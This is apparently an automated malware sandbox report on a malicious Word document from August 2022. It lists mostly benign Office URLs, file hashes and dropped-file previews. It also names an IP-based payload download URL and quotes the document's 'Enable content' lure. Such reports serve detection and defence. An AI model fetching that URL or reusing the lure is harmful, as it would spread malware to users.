https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
    high
    https://login.microsoftonline.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
      high
      https://shell.suite.office.com:14433A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
          high
          https://autodiscover-s.outlook.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
            high
            https://roaming.edog.3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
              high
              https://cdn.entity.3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                    high
                    https://powerlift.acompli.net3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v13A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                      high
                      https://cortana.ai3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                high
                                https://api.aadrm.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                      high
                                      https://cr.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                          high
                                          https://graph.ppe.windows.net3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                high
                                                https://my.microsoftpersonalcontent.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://store.office.cn/addinstemplate3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                    high
                                                    https://messaging.engagement.office.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetect3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedback3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groups3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                        high
                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                      high
                                                                                      https://messaging.lifecycle.office.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                              high
                                                                                              https://wus2.contentsync.3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://incidents.diagnostics.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                        high
                                                                                                        https://api.office.net3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                              high
                                                                                                              https://entitlement.diagnostics.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                  high
                                                                                                                  https://substrate.office.com/search/api/v2/init3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                      high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                          high
                                                                                                                          https://webshell.suite.office.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                              high
                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                high
                                                                                                                                http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_rECA2.tmp.exe, 00000002.00000002.273378499.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://management.azure.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.lifecycle.office.com/getcustommessage163A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://clients.config.office.net/c2r/v1.0/InteractiveInstallation3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://graph.windows.net/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://devnull.onenote.com3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://messaging.action.office.com/3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ncus.pagecontentsync.3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  45.8.146.139
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  44676VMAGE-ASRUfalse
                                                                                                                                                  Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                  Analysis ID:682577
                                                                                                                                                  Start date and time:2022-08-11 18:07:15 +02:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 40s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:airequipmentcorp-doc-08.11.2022.doc
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • GSI enabled (VBA)
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal92.expl.winDOC@4/14@0/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 100% (good quality ratio 77%)
                                                                                                                                                  • Quality average: 59.9%
                                                                                                                                                  • Quality standard deviation: 39.4%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .doc
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.191, 52.109.76.36, 52.109.76.33
                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  No simulations
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):148061
                                                                                                                                                  Entropy (8bit):5.358136210068348
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:5cQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:A1Q9DQe+zuXYr
                                                                                                                                                  MD5:F395C8F247D435AAEA3BE89CC2566428
                                                                                                                                                  SHA1:9ADB47CE29DDFC26125804494EBAE31541B98BC9
                                                                                                                                                  SHA-256:562FDD103601D3FEA5307524A58035AB9FC551809A7FE83E7DE560CAA9172ABE
                                                                                                                                                  SHA-512:9B18B41C3B48F72EAA72161A812776FC96F1FB02ACE9D81736BDC203763445F0D6623D11BEC95DDC2B49712553F2C58201B22029A41ECE5F19A3DB60D657F9FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T16:08:22">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):255992
                                                                                                                                                  Entropy (8bit):7.979945509057379
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:WA8X3URdstKeUr9pS3Ye1B496I0qupYLqUBq5QY:bRdCKBOYe1ByoqueLqi2F
                                                                                                                                                  MD5:4FD2012027291C067724708876BD2AC6
                                                                                                                                                  SHA1:11CF910537D108578F768263DA98CB954464AE8F
                                                                                                                                                  SHA-256:43369516E53294BD97A1E3825B73708A407F33C6DB392DCE78415835362CA3AA
                                                                                                                                                  SHA-512:EAFD06D13D5D04C8BD354023CC356EB9620CDCD1ED97097146CF878420545FB6C6DEFC9EC636A43F34401211DF5BA3AAFDE0120AE570F2E66FC000D0EA326D3D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fGU.3*..].^..{..~z.2....("....^BP.EH.........;. .n.4...P.Vd.D...DHB..9.Ow.....y...=k..........Z.j..Uk..}.Sp.&.H...x./1..dy........"i..I.1<=:.e..*..{..!...C.....S.._.3}8..A.J..o...,K...k.Z...z.}.I...8.j\y.-.^m.Ty...q...Z71FO....2..T7C.M....,c.)?..q..I.<.*.EK.......=.}.....'.!..z. ...m......7..._..:).E..tm.d..i.....2..6...=.-o......[.my{.....+jY.....5...-=.....*rRU.|.W...,K9.@....2..V......|.[i.M.r.S..-..JK.J2[TZ.nC.G...R..l./Q.z..'.h=..oE[..A/.{.m..'Zz.7..I.k.....,~..i.2_..O.W.+.u..eI..E...oy@...p...S../...mYk.{u...S.z8.r@z./...o.d..^>ic..|V..4...I..7Q.....Z.1...-.|m3A:.C.m.T.D.2..QE...^..-.C-.u2$..2.X...AMW.| i.zs.b..qM'.>.*.|...t.....j.5&.9.C.nE..*kQ.dyM....|.....F....U...%_.@.[z...+..o.z....../.m.m>Q..^..X.,Z^..W.^.....a...X...O[u..6..'mV...U...1.5]c...C[V.[z..U^.>.,.[.....IYY...Xy".5..d...W.H.<h.g......Zd..@....v}T@...Yk+..z<`..C..g
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):61935
                                                                                                                                                  Entropy (8bit):7.988218918927523
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
                                                                                                                                                  MD5:4800E90C87A78932178C7D338BA32F43
                                                                                                                                                  SHA1:8006244EDAFF9A31546A17FCF99CB61DA4F69417
                                                                                                                                                  SHA-256:8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
                                                                                                                                                  SHA-512:58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1536
                                                                                                                                                  Entropy (8bit):2.131668560158345
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82l/2kwkvmElgQlRlHllGlwZZn9/vlk:4LG1ND9Pxn82Eks3UNA
                                                                                                                                                  MD5:990B739DCEE177624089BD19E79B1DAA
                                                                                                                                                  SHA1:572AB482803D5FE717849E8D45FE57F3A4605775
                                                                                                                                                  SHA-256:2112324634ECC8A1F0B24D0A2F00502BA5148A5BC8476BA5D16B9D4597E7B892
                                                                                                                                                  SHA-512:77B20E54CFC7ED47EC28428D7540FF85A436517E1D889666AAA798ACCC8D1AED18EB3207178126EA69934C127EF665806AA7F700747DCFC489CBDD61DDEE6401
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):201
                                                                                                                                                  Entropy (8bit):5.110875983732391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
                                                                                                                                                  MD5:6DFF44B8B60DD046290A5420717F052E
                                                                                                                                                  SHA1:2339B6BC052682B5CC618733AEEE776037485D3E
                                                                                                                                                  SHA-256:2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
